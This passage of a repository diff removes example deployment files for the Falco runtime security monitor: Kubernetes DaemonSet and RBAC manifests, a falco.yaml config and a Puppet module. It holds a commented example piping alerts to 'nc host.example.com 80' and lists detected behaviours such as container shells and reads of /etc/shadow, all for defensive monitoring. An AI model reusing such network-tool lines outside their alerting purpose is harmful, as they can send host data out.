k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-account.yaml
serviceaccount "falco-account" created
clusterrole "falco-cluster-role" created
clusterrolebinding "falco-cluster-role-binding" created
k8s-using-daemonset$
```
We also create a service that allows other services to reach the embedded webserver in falco, which listens on https port 8765:
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-service.yaml
service/falco-service created
k8s-using-daemonset$
```
The Daemon Set also relies on a Kubernetes ConfigMap to store the Falco configuration and make the configuration available to the Falco Pods. This allows you to manage custom configuration without rebuilding and redeploying the underlying Pods. In order to create the ConfigMap you'll first need to copy the required configuration from their location in this GitHub repo to the `k8s-with-rbac/falco-config/` directory (please note that you will need to create the /falco-config directory). Any modification of the configuration should be performed on these copies rather than the original files.
```
k8s-using-daemonset$ mkdir -p k8s-with-rbac/falco-config
k8s-using-daemonset$ cp ../../falco.yaml k8s-with-rbac/falco-config/
k8s-using-daemonset$ cp ../../rules/falco_rules.* k8s-with-rbac/falco-config/
k8s-using-daemonset$ cp ../../rules/k8s_audit_rules.yaml k8s-with-rbac/falco-config/
```
If you want to send Falco alerts to a Slack channel, you'll want to modify the `falco.yaml` file to point to your Slack webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Add the below to the bottom of the `falco.yaml` config file you just copied to enable Slack messages.
```
program_output:
enabled: true
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
```
You will also need to enable JSON output. Find the `json_output: false` setting in the `falco.yaml` file and change it to read `json_output: true`. Any custom rules for your environment can be added to into the `falco_rules.local.yaml` file and they will be picked up by Falco at start time. You can now create the ConfigMap in Kubernetes.
```
k8s-using-daemonset$ kubectl create configmap falco-config --from-file=k8s-with-rbac/falco-config
configmap "falco-config" created
k8s-using-daemonset$
```
Now that we have the requirements for our Daemon Set in place, we can create our Daemon Set.
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-daemonset-configmap.yaml
daemonset "falco" created
k8s-using-daemonset$
```
## Deploying to Kubernetes without RBAC enabled (**Deprecated**)
If you are running Kubernetes with Legacy Authorization enabled, you can use `kubectl` to deploy the Daemon Set provided in the `k8s-without-rbac` directory. The example provides the ability to post messages to a Slack channel via a webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Modify the [`args`](https://github.com/draios/falco/blob/dev/examples/k8s-using-daemonset/falco-daemonset.yaml#L21) passed to the Falco container to point to the appropriate URL for your webhook.
```
k8s-using-daemonset$ kubectl create -f k8s-without-rbac/falco-daemonset.yaml
```
When running falco via a container, you might see error messages like the following:
```
mkdir: cannot create directory '/lib/modules/3.10.0-693.el7.centos.test.x86_64/kernel/extra': Read-only file system
cp: cannot create regular file '/lib/modules/3.10.0-693.el7.centos.test.x86_64/kernel/extra/falco-probe.ko.xz': No such file or directory
```
These error messages are innocuous, but if you would like to remove them you can change the /host/lib/modules mount to read-write, by doing below change in `k8s-with-rbac/falco
daemonset-configmap.yaml`:
```
- mountPath: /host/lib/modules
name: lib-modules
- readOnly: true
+ #readOnly: true
```
However, note that this will result in the `falco-probe.ko.xz` file being saved to `/lib/modules` on the host, even after the falco container is removed.
## Verifying the installation
In order to test that Falco is working correctly, you can launch a shell in a Pod. You should see a message in your Slack channel (if configured), or in the logs of the Falco pod.
```
k8s-using-daemonset$ kubectl get pods
NAME READY STATUS RESTARTS AGE
falco-74htl 1/1 Running 0 13h
falco-fqz2m 1/1 Running 0 13h
falco-sgjfx 1/1 Running 0 13h
k8s-using-daemonset$ kubectl exec -it falco-74htl bash
root@falco-74htl:/# exit
k8s-using-daemonset$ kubectl logs falco-74htl
{"output":"17:48:58.590038385: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-74htl container=a98c2aa8e670 shell=bash parent=<NA> cmdline=bash terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2017-12-20T17:48:58.590038385Z", "output_fields": {"container.id":"a98c2aa8e670","evt.time":1513792138590038385,"k8s.pod.name":"falco-74htl","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}
k8s-using-daemonset$
```
Alternatively, you can deploy the [Falco Event Generator](https://github.com/draios/falco/wiki/Generating-Sample-Events) deployement to have events automatically generated. Please note that this Deployment will generate a large number of events.
```
k8s-using-daemonset$ kubectl create -f falco-event-generator-deployment.yaml \
&& sleep 1 \
&& kubectl delete -f falco-event-generator-deployment.yaml
deployment "falco-event-generator-deployment" created
deployment "falco-event-generator-deployment" deleted
k8s-using-daemonset$
```

View File

@@ -1,17 +0,0 @@
apiVersion: apps/v1
kind: Deployment
metadata:
name: falco-event-generator-deployment
labels:
name: falco-event-generator-deployment
app: demo
spec:
replicas: 1
template:
metadata:
labels:
app: falco-event-generator
spec:
containers:
- name: falco-event-generator
image: sysdig/falco-event-generator:latest

View File

@@ -1,41 +0,0 @@
apiVersion: v1
kind: ServiceAccount
metadata:
name: falco-account
labels:
app: falco-example
role: security
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: falco-cluster-role
labels:
app: falco-example
role: security
rules:
- apiGroups: ["extensions",""]
resources: ["nodes","namespaces","pods","replicationcontrollers","replicasets","services","daemonsets","deployments","events","configmaps"]
verbs: ["get","list","watch"]
- apiGroups: ["apps"]
resources: ["daemonsets","deployments","replicasets","statefulsets"]
verbs: ["get","list","watch"]
- nonResourceURLs: ["/healthz", "/healthz/*"]
verbs: ["get"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: falco-cluster-role-binding
namespace: default
labels:
app: falco-example
role: security
subjects:
- kind: ServiceAccount
name: falco-account
namespace: default
roleRef:
kind: ClusterRole
name: falco-cluster-role
apiGroup: rbac.authorization.k8s.io

View File

@@ -1,100 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: falco-daemonset
labels:
app: falco-example
role: security
spec:
selector:
matchLabels:
app: falco-example
role: security
template:
metadata:
labels:
app: falco-example
role: security
spec:
serviceAccount: falco-account
initContainers:
- name: probeloader
image: falcosecurity/probeloader:latest
securityContext:
privileged: true
#env:
# - name: FALCOCTL_FALCO_VERSION
# value: 0.21.0
# - name: FALCOCTL_FALCO_PROBE_URL
# value:
# - name: FALCOCTL_FALCO_PROBE_REPO
# value: "https://s3.amazonaws.com/download.draios.com/stable/sysdig-probe-binaries/"
volumeMounts:
- mountPath: /host/boot
name: boot-fs
readOnly: true
containers:
- name: falco
image: falcosecurity/falco:0.21.0-slim
securityContext:
privileged: true
# Uncomment the 3 lines below to enable eBPF support for Falco.
# This allows Falco to run on Google COS.
# Leave blank for the default probe location, or set to the path
# of a precompiled probe.
# env:
# - name: FALCO_BPF_PROBE
# value: ""
args: [ "/usr/bin/falco", "--cri", "/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
- mountPath: /host/run/containerd/containerd.sock
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
- mountPath: /host/proc
name: proc-fs
readOnly: true
- mountPath: /host/boot
name: boot-fs
readOnly: true
- mountPath: /host/lib/modules
name: lib-modules
readOnly: true
- mountPath: /host/usr
name: usr-fs
readOnly: true
- mountPath: /host/etc/
name: etc-fs
readOnly: true
- mountPath: /etc/falco
name: falco-config
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
- name: containerd-socket
hostPath:
path: /run/containerd/containerd.sock
- name: dev-fs
hostPath:
path: /dev
- name: proc-fs
hostPath:
path: /proc
- name: boot-fs
hostPath:
path: /boot
- name: lib-modules
hostPath:
path: /lib/modules
- name: usr-fs
hostPath:
path: /usr
- name: etc-fs
hostPath:
path: /etc
- name: falco-config
configMap:
name: falco-config

View File

@@ -1,85 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: falco-daemonset
labels:
app: falco-example
role: security
spec:
selector:
matchLabels:
app: falco-example
role: security
template:
metadata:
labels:
app: falco-example
role: security
spec:
serviceAccount: falco-account
containers:
- name: falco
image: falcosecurity/falco:latest
securityContext:
privileged: true
# Uncomment the 3 lines below to enable eBPF support for Falco.
# This allows Falco to run on Google COS.
# Leave blank for the default probe location, or set to the path
# of a precompiled probe.
# env:
# - name: FALCO_BPF_PROBE
# value: ""
args: [ "/usr/bin/falco", "--cri", "/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
- mountPath: /host/run/containerd/containerd.sock
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
readOnly: true
- mountPath: /host/proc
name: proc-fs
readOnly: true
- mountPath: /host/boot
name: boot-fs
readOnly: true
- mountPath: /host/lib/modules
name: lib-modules
readOnly: true
- mountPath: /host/usr
name: usr-fs
readOnly: true
- mountPath: /host/etc/
name: etc-fs
readOnly: true
- mountPath: /etc/falco
name: falco-config
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
- name: containerd-socket
hostPath:
path: /run/containerd/containerd.sock
- name: dev-fs
hostPath:
path: /dev
- name: proc-fs
hostPath:
path: /proc
- name: boot-fs
hostPath:
path: /boot
- name: lib-modules
hostPath:
path: /lib/modules
- name: usr-fs
hostPath:
path: /usr
- name: etc-fs
hostPath:
path: /etc
- name: falco-config
configMap:
name: falco-config

View File

@@ -1,13 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: falco-service
labels:
app: falco-example
role: security
spec:
selector:
app: falco-example
ports:
- protocol: TCP
port: 8765

View File

@@ -1,68 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: falco
labels:
name: falco-daemonset
app: demo
spec:
selector:
matchLabels:
name: falco
app: demo
role: security
template:
metadata:
labels:
name: falco
app: demo
role: security
spec:
containers:
- name: falco
image: falcosecurity/falco:latest
securityContext:
privileged: true
args: [ "/usr/bin/falco", "--cri", "/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://kubernetes.default", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o", "program_output.program=jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"]
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
- mountPath: /host/run/containerd/containerd.sock
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
readOnly: true
- mountPath: /host/proc
name: proc-fs
readOnly: true
- mountPath: /host/boot
name: boot-fs
readOnly: true
- mountPath: /host/lib/modules
name: lib-modules
readOnly: true
- mountPath: /host/usr
name: usr-fs
readOnly: true
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
- name: containerd-socket
hostPath:
path: /run/containerd/containerd.sock
- name: dev-fs
hostPath:
path: /dev
- name: proc-fs
hostPath:
path: /proc
- name: boot-fs
hostPath:
path: /boot
- name: lib-modules
hostPath:
path: /lib/modules
- name: usr-fs
hostPath:
path: /usr

View File

@@ -1,62 +0,0 @@
# Example Kubernetes Deployments for Falco
This directory gives you the required YAML files to stand up Falco on Kubernetes only for audit purpose as a Deployment.
To deploy Falco on Kubernetes for audit:
- `k8s-with-rbac` - This directory provides a definition to deploy a Deployment on Kubernetes with RBAC enabled.
Also provided:
- `falco-event-generator-deployment.yaml` - A Kubernetes Deployment to generate sample events. This is useful for testing, but note it will generate a large number of events.
## Deploying to Kubernetes with RBAC enabled
Since v1.8 RBAC has been available in Kubernetes, and running with RBAC enabled is considered the best practice. The `k8s-with-rbac` directory provides the YAML to create a Service Account for Falco, as well as the ClusterRoles and bindings to grant the appropriate permissions to the Service Account.
```
k8s-using-deployment$ kubectl create -f k8s-with-rbac/falco-k8s-audit-account.yaml
serviceaccount "falco-account" created
clusterrole "falco-cluster-role" created
clusterrolebinding "falco-cluster-role-binding" created
k8s-using-deployment$
```
We also create a service that allows other services to reach the embedded webserver in falco, which listens on https port 8765:
```
k8s-using-deployment$ kubectl create -f k8s-with-rbac/falco-k8s-audit-service.yaml
service/falco-service created
k8s-using-deployment$
```
The Deployment also relies on a Kubernetes ConfigMap to store the Falco configuration and make the configuration available to the Falco Pods. This allows you to manage custom configuration without rebuilding and redeploying the underlying Pods. In order to create the ConfigMap you'll first need to copy the required configuration from their location in this GitHub repo to the `k8s-with-rbac/falco-config/` directory (please note that you will need to create the /falco-config directory). Any modification of the configuration should be performed on these copies rather than the original files.
```
k8s-using-deployment$ mkdir -p k8s-with-rbac/falco-config
k8s-using-deployment$ cp ./falco.yaml k8s-with-rbac/falco-config/
k8s-using-deployment$ cp ../../rules/k8s_audit_rules.yaml k8s-with-rbac/falco-config/
```
If you want to send Falco alerts to a Slack channel, you'll want to modify the `falco.yaml` file to point to your Slack webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Add the below to the bottom of the `falco.yaml` config file you just copied to enable Slack messages.
```
program_output:
enabled: true
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
```
You will also need to enable JSON output. Find the `json_output: false` setting in the `falco.yaml` file and change it to read `json_output: true`. Any custom rules for your environment can be added to into the `falco_rules.local.yaml` file and they will be picked up by Falco at start time. You can now create the ConfigMap in Kubernetes.
```
k8s-using-deployment$ kubectl create configmap falco-config --from-file=k8s-with-rbac/falco-config
configmap "falco-config" created
k8s-using-deployment$
```
Now that we have the requirements for our Deployment in place, we can create our Deployment.
```
k8s-using-deployment$ kubectl create -f k8s-with-rbac/falco-k8s-audit-deployment.yaml
daemonset "falco" created
k8s-using-deployment$
```

View File

@@ -1,17 +0,0 @@
apiVersion: apps/v1
kind: Deployment
metadata:
name: falco-event-generator-deployment
labels:
name: falco-event-generator-deployment
app: demo
spec:
replicas: 1
template:
metadata:
labels:
app: falco-event-generator
spec:
containers:
- name: falco-event-generator
image: sysdig/falco-event-generator:latest

View File

@@ -1,167 +0,0 @@
#
# Copyright (C) 2016-2018 The Falco Authors.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File(s) or Directories containing Falco rules, loaded at startup.
# The name "rules_file" is only for backwards compatibility.
# If the entry is a file, it will be read directly. If the entry is a directory,
# every file in that directory will be read, in alphabetical order.
#
# falco_rules.yaml ships with the falco package and is overridden with
# every new software version. falco_rules.local.yaml is only created
# if it doesn't exist. If you want to customize the set of rules, add
# your customizations to falco_rules.local.yaml.
#
# The files will be read in the order presented here, so make sure if
# you have overrides they appear in later files.
rules_file:
- /etc/falco/k8s_audit_rules.yaml
# If true, the times displayed in log messages and output messages
# will be in ISO 8601. By default, times are displayed in the local
# time zone, as governed by /etc/localtime.
time_format_iso_8601: false
# Whether to output events in json or text
json_output: true
# When using json output, whether or not to include the "output" property
# itself (e.g. "File below a known binary directory opened for writing
# (user=root ....") in the json output.
json_include_output_property: true
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: true
log_syslog: true
# Minimum log level to include in logs. Note: these levels are
# separate from the priority field of rules. This refers only to the
# log level of falco's internal logging. Can be one of "emergency",
# "alert", "critical", "error", "warning", "notice", "info", "debug".
log_level: info
# Minimum rule priority level to load and run. All rules having a
# priority more severe than this level will be loaded/run. Can be one
# of "emergency", "alert", "critical", "error", "warning", "notice",
# "info", "debug".
priority: debug
# Whether or not output to any of the output channels below is
# buffered. Defaults to false
buffered_outputs: false
# Falco uses a shared buffer between the kernel and userspace to pass
# system call information. When falco detects that this buffer is
# full and system calls have been dropped, it can take one or more of
# the following actions:
# - "ignore": do nothing. If an empty list is provided, ignore is assumed.
# - "log": log a CRITICAL message noting that the buffer was full.
# - "alert": emit a falco alert noting that the buffer was full.
# - "exit": exit falco with a non-zero rc.
#
# The rate at which log/alert messages are emitted is governed by a
# token bucket. The rate corresponds to one message every 30 seconds
# with a burst of 10 messages.
syscall_event_drops:
actions:
- log
- alert
rate: .03333
max_burst: 10
# A throttling mechanism implemented as a token bucket limits the
# rate of falco notifications. This throttling is controlled by the following configuration
# options:
# - rate: the number of tokens (i.e. right to send a notification)
# gained per second. Defaults to 1.
# - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
#
# With these defaults, falco could send up to 1000 notifications after
# an initial quiet period, and then up to 1 notification per second
# afterward. It would gain the full burst back after 1000 seconds of
# no activity.
outputs:
rate: 1
max_burst: 1000
# Where security notifications should go.
# Multiple outputs can be enabled.
syslog_output:
enabled: true
# If keep_alive is set to true, the file will be opened once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the file will be re-opened
# for each output message.
#
# Also, the file will be closed and reopened if falco is signaled with
# SIGUSR1.
file_output:
enabled: false
keep_alive: false
filename: ./events.txt
stdout_output:
enabled: true
# Falco contains an embedded webserver that can be used to accept K8s
# Audit Events. These config options control the behavior of that
# webserver. (By default, the webserver is disabled).
#
# The ssl_certificate is a combination SSL Certificate and corresponding
# key contained in a single file. You can generate a key/cert as follows:
#
# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
# $ cat certificate.pem key.pem > falco.pem
# $ sudo cp falco.pem /etc/falco/falco.pem
webserver:
enabled: true
listen_port: 8765
k8s_audit_endpoint: /k8s_audit
ssl_enabled: false
ssl_certificate: /etc/falco/falco.pem
# Possible additional things you might want to do with program output:
# - send to a slack webhook:
# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
# - logging (alternate method than syslog):
# program: logger -t falco-test
# - send over a network connection:
# program: nc host.example.com 80
# If keep_alive is set to true, the program will be started once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the program will be re-spawned
# for each output message.
#
# Also, the program will be closed and reopened if falco is signaled with
# SIGUSR1.
program_output:
enabled: false
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
http_output:
enabled: false
url: http://some.url

View File

@@ -1,41 +0,0 @@
apiVersion: v1
kind: ServiceAccount
metadata:
name: falco-account
labels:
app: falco-k8s-audit
role: security
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: falco-cluster-role
labels:
app: falco-k8s-audit
role: security
rules:
- apiGroups: ["extensions",""]
resources: ["nodes","namespaces","pods","replicationcontrollers","replicasets","services","daemonsets","deployments","events","configmaps"]
verbs: ["get","list","watch"]
- apiGroups: ["apps"]
resources: ["daemonsets","deployments","replicasets","statefulsets"]
verbs: ["get","list","watch"]
- nonResourceURLs: ["/healthz", "/healthz/*"]
verbs: ["get"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: falco-cluster-role-binding
namespace: default
labels:
app: falco-k8s-audit
role: security
subjects:
- kind: ServiceAccount
name: falco-account
namespace: default
roleRef:
kind: ClusterRole
name: falco-cluster-role
apiGroup: rbac.authorization.k8s.io

View File

@@ -1,32 +0,0 @@
apiVersion: apps/v1
kind: Deployment
metadata:
name: falco-k8s-audit
labels:
app: falco-k8s-audit
role: security
spec:
replicas: 1
selector:
matchLabels:
app: falco-k8s-audit
template:
metadata:
labels:
app: falco-k8s-audit
role: security
spec:
serviceAccount: falco-account
containers:
- name: falco
image: falcosecurity/falco:latest
securityContext:
privileged: true
args: [ "/usr/bin/falco", "--disable-source", "syscall", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
volumeMounts:
- mountPath: /etc/falco
name: falco-config
volumes:
- name: falco-config
configMap:
name: falco-config

View File

@@ -1,13 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: falco-k8s-audit
labels:
app: falco-k8s-audit
role: security
spec:
selector:
app: falco-k8s-audit
ports:
- protocol: TCP
port: 8765

View File

@@ -1,6 +0,0 @@
# Kubernetes Response Engine directory moved
As long as Kubernetes Response Engine and Falco has different release cycles,
the Kubernetes Response Engine has been moved to its own repository.
You can find it in https://github.com/falcosecurity/kubernetes-response-engine

View File

@@ -1,7 +0,0 @@
/var/log/falco-events.log {
rotate 5
size 1M
postrotate
/usr/bin/killall -USR1 falco
endscript
}

View File

@@ -1,3 +0,0 @@
# Example Puppet Falco Module
This contains an example [Puppet](https://puppet.com/) module for Falco.

View File

@@ -1,7 +0,0 @@
source 'https://rubygems.org'
puppetversion = ENV.key?('PUPPET_VERSION') ? "= #{ENV['PUPPET_VERSION']}" : ['>= 4.7']
gem 'puppet', puppetversion
gem 'puppetlabs_spec_helper', '>= 0.1.0'
gem 'puppet-lint', '>= 0.3.2'
gem 'facter', '>= 1.7.0'

View File

@@ -1,241 +0,0 @@
# Falco
#### Table of Contents
1. [Overview](#overview)
2. [Module Description - What the module does and why it is useful](#module-description)
3. [Setup - The basics of getting started with Falco](#setup)
* [What Falco affects](#what-falco-affects)
* [Beginning with Falco](#beginning-with-falco)
4. [Usage - Configuration options and additional functionality](#usage)
5. [Reference - An under-the-hood peek at what the module is doing and how](#reference)
5. [Limitations - OS compatibility, etc.](#limitations)
6. [Development - Guide for contributing to the module](#development)
## Overview
Sysdig Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by sysdigs system call capture infrastructure, Falco lets you continuously monitor and detect container, application, host, and network activity... all in one place, from one source of data, with one set of rules.
#### What kind of behaviors can Falco detect?
Falco can detect and alert on any behavior that involves making Linux system calls. Thanks to Sysdig's core decoding and state tracking functionality, Falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, you can easily detect things like:
- A shell is run inside a container
- A container is running in privileged mode, or is mounting a sensitive path like `/proc` from the host.
- A server process spawns a child process of an unexpected type
- Unexpected read of a sensitive file (like `/etc/shadow`)
- A non-device file is written to `/dev`
- A standard system binary (like `ls`) makes an outbound network connection
## Module Description
This module configures Falco as a systemd service. You configure Falco
to send its notifications to one or more output channels (syslog,
files, programs).
## Setup
### What Falco affects
This module affects the following:
* The main Falco configuration file `/etc/falco/falco.yaml`, including
** Output format (JSON vs plain text)
** Log level
** Rule priority level to run
** Output buffering
** Output throttling
** Output channels (syslog, file, program)
### Beginning with Falco
To have Puppet install Falco with the default parameters, declare the Falco class:
``` puppet
class { 'falco': }
```
When you declare this class with the default options, the module:
* Installs the appropriate Falco software package and installs the falco-probe kernel module for your operating system.
* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled.
* Starts the Falco service.
## Usage
### Enabling file output
To enable file output, set the `file_output` hash, as follows:
``` puppet
class { 'falco':
file_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'filename' => '/tmp/falco-events.txt'
},
}
```
### Enabling program output
To enable program output, set the `program_output` hash and optionally the `json_output` parameters, as follows:
``` puppet
class { 'falco':
json_output => 'true',
program_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
}
```
## Reference
* [**Public classes**](#public-classes)
* [Class: falco](#class-falco)
### Public Classes
#### Class: `falco`
Guides the basic setup and installation of Falco on your system.
When this class is declared with the default options, Puppet:
* Installs the appropriate Falco software package and installs the falco-probe kernel module for your operating system.
* Creates the required configuration file `/etc/Falco/falco.yaml`. By default only syslog output is enabled.
* Starts the falco service.
You can simply declare the default `falco` class:
``` puppet
class { 'falco': }
```
###### `rules_file`
An array of files for Falco to load. Order matters--the first file listed will be loaded first.
Default: `['/etc/falco/falco_rules.yaml', '/etc/falco/falco_rules.local.yaml']`
##### `json_output`
Whether to output events in json or text.
Default: `false`
##### `log_stderr`
Send Falco's logs to stderr. Note: this is not notifications, this is
logs from the Falco daemon itself.
Default: `false`
##### `log_syslog`
Send Falco's logs to syslog. Note: this is not notifications, this is
logs from the Falco daemon itself.
Default: `true`
##### `log_level`
Minimum log level to include in logs. Note: these levels are
separate from the priority field of rules. This refers only to the
log level of Falco's internal logging. Can be one of "emergency",
"alert", "critical", "error", "warning", "notice", "info", "debug".
Default: `info`
##### `priority`
Minimum rule priority level to load and run. All rules having a
priority more severe than this level will be loaded/run. Can be one
of "emergency", "alert", "critical", "error", "warning", "notice",
"info", "debug".
Default: `debug`
##### `buffered_outputs`
Whether or not output to any of the output channels below is
buffered.
Default: `true`
##### `outputs_rate`/`outputs_max_burst`
A throttling mechanism implemented as a token bucket limits the
rate of Falco notifications. This throttling is controlled by the following configuration
options:
* `outputs_rate`: the number of tokens (i.e. right to send a notification)
gained per second. Defaults to 1.
* `outputs_max_burst`: the maximum number of tokens outstanding. Defaults to 1000.
##### `syslog_output
Controls syslog output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `true`.
Example:
``` puppet
class { 'falco':
syslog_output => {
'enabled' => 'true',
},
}
```
##### `file_output`
Controls file output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `false`.
* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
* `filename`: Notifications will be written to this file.
Example:
``` puppet
class { 'falco':
file_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'filename' => '/tmp/falco-events.txt'
},
}
```
##### `program_output
Controls program output for notifications. Value: a hash, containing the following:
* `enabled`: `true` or `false`. Default: `false`.
* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`.
* `program`: Notifications will be written to this program.
Example:
``` puppet
class { 'falco':
program_output => {
'enabled' => 'true',
'keep_alive' => 'false',
'program' => 'curl http://some-webhook.com'
},
}
```
## Limitations
The module works where Falco works as a daemonized service (generally, Linux only).
## Development
For more information on Sysdig Falco, visit our [github](https://github.com/falcosecurity/falco) or [web site](https://sysdig.com/opensource/falco/).

View File

@@ -1,18 +0,0 @@
require 'rubygems'
require 'puppetlabs_spec_helper/rake_tasks'
require 'puppet-lint/tasks/puppet-lint'
PuppetLint.configuration.send('disable_80chars')
PuppetLint.configuration.ignore_paths = ["spec/**/*.pp", "pkg/**/*.pp"]
desc "Validate manifests, templates, and ruby files"
task :validate do
Dir['manifests/**/*.pp'].each do |manifest|
sh "puppet parser validate --noop #{manifest}"
end
Dir['spec/**/*.rb','lib/**/*.rb'].each do |ruby_file|
sh "ruby -c #{ruby_file}" unless ruby_file =~ /spec\/fixtures/
end
Dir['templates/**/*.erb'].each do |template|
sh "erb -P -x -T '-' #{template} | ruby -c"
end
end

View File

@@ -1,12 +0,0 @@
# == Class: falco::config
class falco::config inherits falco {
file { '/etc/falco/falco.yaml':
ensure => file,
require => Class['falco::install'],
notify => Service['falco'],
owner => 'root',
group => 'root',
mode => '0644',
content => template('falco/falco.yaml.erb'),
}
}

View File

@@ -1,41 +0,0 @@
# == Class: falco
class falco (
# Configuration parameters
$rules_file = $falco::params::rules_file,
$json_output = $falco::params::json_output,
$json_include_output_property = $falco::params::json_include_output_property,
$log_stderr = $falco::params::log_stderr,
$log_syslog = $falco::params::log_syslog,
$log_level = $falco::params::log_level,
$priority = $falco::params::priority,
$buffered_outputs = $falco::params::buffered_outputs,
$outputs_rate = $falco::params::outputs_rate,
$outputs_max_burst = $falco::params::outputs_max_burst,
$syslog_output = $falco::params::syslog_output,
$file_output = $falco::params::file_output,
$stdout_output = $falco::params::stdout_output,
$webserver = $falco::params::webserver,
$program_output = $falco::params::program_output,
$http_output = $falco::params::http_output,
# Installation parameters
$package_ensure = $falco::params::package_ensure,
# Service parameters
$service_ensure = $falco::params::service_ensure,
$service_enable = $falco::params::service_enable,
$service_restart = $falco::params::service_restart,
) inherits falco::params {
class { 'falco::repo': }
-> class { 'falco::install': }
-> class { 'falco::config': }
~> class { 'falco::service': }
contain falco::install
contain falco::config
}

View File

@@ -1,19 +0,0 @@
# == Class: falco::install
class falco::install inherits falco {
package { 'falco':
ensure => $::falco::package_ensure,
}
if ($::falco::file_output != undef) {
logrotate::rule { 'falco_output':
path => $::falco::file_output[filename],
rotate => 5,
rotate_every => 'day',
size => '1M',
missingok => true,
compress => true,
sharedscripts => true,
postrotate => '/usr/bin/killall -USR1 falco'
}
}
}

Some files were not shown because too many files have changed in this diff Show More